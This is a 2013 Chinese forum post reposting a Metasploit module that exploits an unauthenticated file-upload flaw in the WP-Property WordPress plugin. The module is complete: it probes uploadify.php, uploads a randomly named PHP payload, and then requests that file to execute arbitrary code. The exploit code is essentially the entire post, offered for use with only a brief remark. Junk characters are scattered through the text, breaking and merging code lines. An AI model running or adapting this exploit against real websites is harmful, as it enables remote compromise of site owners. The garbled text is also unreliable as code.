WordPress WP-Property PHP 文件上传漏洞) ?. M6 x }+ c" U( W0 y
: e) t5 Y ]$ N# g3 C
## # This file is part of the Metasploit Framework and may be subject to2 n3 L9 ] `$ }' h
, j6 b+ x2 {! l! C
# redistribution and commercial restrictions. Please see the Metasploit
+ z6 \$ E9 a" g$ h1 t, p
& T" r* X6 c; h) P6 J0 q3 Y, Z* P# Framework web site for more information on licensing and terms of use.
) _2 {" ]5 A% R Z
- J6 z* C. B0 H- L. ?9 w% O6 B# http://metasploit.com/framework/ ##
( O% f2 f$ Z. P" E$ y7 Y
5 |# R* C! o" Q9 I! \6 ^, a& h ( [3 B% ?) _: J; q
1 p( D" P/ R/ I- j
* u, J8 F' P. E3 ]' x3 C& r7 Y* P, g$ e! {7 ?7 R
require 'msf/core'* P! d& V3 |, ?) C4 E' U- f
require 'msf/core/exploit/php_exe'$ Z+ V8 ?+ O0 s; z9 r5 ?6 R
% n8 k8 C+ W6 }7 L! L; `- f
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
2 P" x: [ }. `; B% \/ J'Description' => %q{
8 W* f" v' u) e8 O6 tThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
e! d; @; u0 Q/ G# U4 S) G: O$ _3 L[4 v2 a/ \. Z& X
'Sammy FORGIT', # initial discovery8 O! M3 ~+ g0 R. V! [5 a. u3 z
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
+ k8 K# l7 \8 r }6 m, I],
2 r: ~9 a& h% l; x6 v'License' => MSF_LICENSE,: y5 e7 Q2 |3 H+ U# b. q8 R& V
'References' =>
9 z. C1 e% R# t6 N5 t, Z0 J[1 b( S/ K# o* S2 W, s9 ~4 B
[ 'OSVDB', '82656' ],
) d9 S$ n6 h' e, g8 c' ?2 v: w[ 'BID', '53787' ],: Z# l$ i B7 C
[ 'EDB', '18987'],
+ ^' |: {3 \. t) W8 i[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
0 l$ T! y& b2 \],
, M6 z/ W& M2 ]0 z% W4 b( F'Payload' =>
0 ^# Y: I' W" B+ A% d' `{
3 v( Q( i# [4 E1 }2 i'BadChars' => "\x00"," N! U8 K# @6 a+ {
},
7 D( j, F- i* a8 z- s4 T'Platform' => 'php',
. @1 ^$ u: T6 C$ c'Arch' => ARCH_PHP,8 r; q6 L) X/ W# k" z
'Targets' =>
6 v R% q4 a0 y2 {[/ F7 R' D3 r: O- @
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],/ n6 v1 S0 G/ L, [
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
. D+ f( T6 r* A* v' w$ M5 _6 ?% t],% ~- c' V! j! A
'DefaultTarget' => 0,
8 _0 | q+ d9 h5 G9 N: d) X'DisclosureDate' => 'Mar 26 2012'))0 `9 `) ~4 Q. W1 `" h0 W$ G
. l. V! W) x) Q" b' Q. l
register_options(
+ Q( Q8 t$ p6 \, d1 V[) `( s# B3 C% b( M+ w0 b" E0 _4 H1 e
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
6 c0 k" p- T& b t _# h], self.class)
4 u! l$ @* m. ]& h. s4 tend
; S% C4 [' \0 A+ m" H3 f! v& B9 c3 p4 E! H7 D7 Q% m- a
def check" d. r. U, N7 p9 t- d
uri = target_uri.path, ]) P' t$ o t' b) e
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',# X: T0 e! O) L
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"' [/ h- _, h0 H3 `6 o, j
})
7 k( y) Z) J, j5 ?$ Q0 e1 t# `, ? d
if not res or res.code != 200% b! q* S/ L) O1 E9 A4 D
return Exploit::CheckCode::Unknown/ S- }, [5 |4 @% M6 ]# M4 n$ K
end R" v( e+ _5 X0 I
a) u& \4 l1 u2 L" m& ureturn Exploit::CheckCode::Appears* Q F# `; b8 `( Y! [+ b
end
* p' V3 s7 E$ x, d7 Q- [" {* Y! F( w! N/ z
def exploit7 g" ^& x7 c y, E* p! @2 _6 {
uri = target_uri.path7 C; e0 D* n! u! {
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true), _' Q! ^% D% `; w
9 m# ~7 Z: g; w; o5 O; Odata = Rex::MIME::Message.new
( r2 P/ i" ]: i6 R1 Bdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\""). n) u- B7 d2 ^ j$ U: q
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")7 T( o+ g9 f" B4 P4 x
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
, F2 n! N! ^: _6 h4 E# R `4 Q4 N5 m) w$ W
print_status("#{peer} - Uploading payload #{@payload_name}"); _9 x$ L1 i5 N6 r2 \
res = send_request_cgi({
7 ~# u& g4 o8 K! g( q$ }'method' => 'POST',- C, _9 S3 f4 L, F* u" J# R
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",; ]0 }8 }0 s, S+ u/ g& j! W
'ctype' => "multipart/form-data; boundary=#{data.bound}",
1 i3 u+ o5 ^- W4 |'data' => post_data" v5 x! f0 j5 w e# u( w) L
})
' |5 j! O% h- H- t4 T& Q3 Y1 t# q
1 Q0 G/ ?$ F: }$ P0 v3 `; Sif not res or res.code != 200 or res.body !~ /#{@payload_name}/
& [+ h L, o, z" [4 d- `% mfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")) `: V2 ~; m6 J
end4 F6 i+ J/ t: L0 M5 k! v- h4 N
* w# @2 w! n' J" {2 N1 y2 L! _
upload_uri = res.body: ?7 e0 G5 u4 s# Q7 I$ j7 d
6 Z7 a6 t; J9 g* Rprint_status("#{peer} - Executing payload #{@payload_name}")! f4 s2 F C% b5 P5 ~% b4 n+ |
res = send_request_raw({7 q! T. |0 N$ |# x$ a8 u7 J; A
'uri' => upload_uri,+ |3 S$ f7 }* e. j* w
'method' => 'GET'# b6 I+ x4 g! G S, K8 C6 w
})' F: z5 I) `6 \3 i
end% s! k1 n0 L! Y6 D5 d1 x1 P9 t
end
7 a6 u3 D: W$ ]% }% u! o
0 O; M+ h4 c4 |' e& p7 H6 |2 j, L; n! G不要问我这写的是什么 怎么利用 我是说msf.% a! |& X: v; q( H
$ P) T* r$ w5 y( m$ s
|
发表于 2013-1-4 19:51:30
收藏
支持
反对